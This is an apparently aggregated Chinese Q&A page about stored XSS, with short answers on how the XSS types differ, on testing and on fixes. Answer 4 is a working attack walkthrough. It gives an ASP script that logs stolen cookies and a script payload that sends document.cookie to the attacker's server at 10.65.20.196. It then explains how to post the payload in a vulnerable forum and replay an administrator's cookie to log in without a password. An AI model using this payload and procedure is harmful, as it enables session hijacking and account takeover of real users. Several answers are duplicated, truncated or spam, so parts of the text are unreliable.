存儲型xss
1. 存儲型XSS與反射型XSS有什麼區別
XSS就是XSS。所謂「存儲型」、「反射型」都是從黑客利用的角度區分的。對於程序員來說意義不大,反而是誤導。只有「DOM-based」型略有不同。
XSS、SQL injection之類的漏洞,原理都是破壞跨層協議的數據/指令的構造。
2. 存儲型XSS與反射型XSS有什麼區別
存儲型XSS是指持久化,代碼是存儲在伺服器中的,反射型XSS,是指非持久化,需要欺騙用戶自己去點擊鏈接才能觸發XSS代碼,所以這是兩者比較大的區別。
3. DOM-based XSS 與存儲性 XSS,反射型 XSS 有什麼區別
反射型XSS(non-persistent XSS), 存儲型XSS(persistent XSS), DOM Based XSS4.1 非持久性跨站點腳本攻擊非持久性XSS也稱為反射型跨站漏洞。它是最常見的類型的...
4. xss漏洞獲取cookie怎麼解決方案
XSS獲取cookie並利用
獲取cookie利用代碼cookie.asp
<html>
<title>xx</title>
<body>
<%testfile = Server.MapPath('code.txt') //先構造一個路徑,也就是取網站根目錄,創造一個在根目錄下的code.txt路徑,保存在testfile中
msg = Request('msg') //獲取提交過來的msg變數,也就是cookie值
set fs = server.CreateObject('scripting.filesystemobject')//創建一個fs對象
set thisfile = fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(''&msg&'')//像code.txt中寫入獲取來的cookie
thisfile.close() //關閉
set fs = nothing%>
</body>
</html>
把上述文件保存為cookie.asp文件,放到你自己的網站伺服器下。比如這里我們自己搭建的伺服器為:http://10.65.20.196:8080。
XSS構造語句
<script>window.open('http://10.65.20.196:8080/cookie.asp?msg='+document.cookie)</script>
把上述語句放到你找到的存在XSS的目標中,不過這里最好是存儲型xss,比如你找到了某個博客或者論壇什麼的存在存儲型XSS,你在裡面發一篇帖子或者留上你的評論,內容就是上述語句,當其他用戶或者管理員打開這個評論或者帖子鏈接後,就會觸發,然後跳轉到的頁面,然後當前賬戶的coolie信息就當成參數發到你的網站下的文件里了。然後的然後你就可以那這個cookie登陸了。。。。。。
簡單步驟如下:
1、在存在漏洞的論壇中發日誌:
X
2、然後以管理遠登陸,進入後頁面會跳轉,此時cookie就發送到你的伺服器下的code.txt文件中了:
3、這是沒有賬戶前的登陸界面:
4、打開firefox的Tamper Data插件,點擊Start Tamper開始抓取信息,刷新登陸界面,然後會跳出對話框,點擊Tamper按鈕,在途中的cookie一欄中替換掉你抓取到的cookie,單擊確定發送請求數據:
5、替換cookie後不用輸用戶名密碼就順利進入管理員賬戶了:
5. 如何有效的測試存儲型XSS
進一步測試存儲型XSS 的利用
找到一個XSS點之後
alert(/xss/); alert(document.cookie);
輸入點長度限制 突破長度限制 漏洞的利用 惡意代碼的隱蔽性
6. 如何修復Discuz存儲型XSS漏洞(2013-06-20)大神們幫幫忙
親,可以來這里看看,關於XSS跨站腳本漏洞修復的問題!----/51onb.com
7. 查找儲存型xss 反射型xss漏洞 HTML xml js 都要學到哪
先把最基礎的html知識學好再說吧,這些所謂xss漏洞無非是熟而鑽空而已
8. 存儲型XSS與反射型XSS有什麼區別
反射型xss(non-persistent
xss),
存儲型xss(persistent
xss),
dom
based
xss4.1
非持久性跨站點腳本攻擊非持久性xss也稱為反射型跨站漏洞。它是最常見的類型的...
9. 什麼是存儲型xss漏洞
Web2.0時代,XSS漏洞不容小覷。特別是在UGC業務,支持「安全的」HTML是業務必須的特性,這就對UGC安全過濾器要求特別高,稍有不慎就會出現存儲XSS漏洞。
整篇文章著眼點在「方案」,後續有機會我們還可以說說API的運營故事(這個元老級項目故事很多)。通過對API的精細化運營是可以發現0day漏洞的——API自身的,甚至包括瀏覽器。比如CVE-2009-1862、CVE-2011-2458 以及一些其他八卦。
存儲型XSS漏洞,這個作為漏洞界的元老級漏洞類型,在當前web2.0時代,一旦被利用,對業務造成的影響也將是轟轟烈烈的,比如之前的「XX咖啡廣告」:
10. 用phpstudy搭建的dvwa為什麼測試不了存儲型xss
呃,一看就新手,我也教不了你什麼,網路後盾網。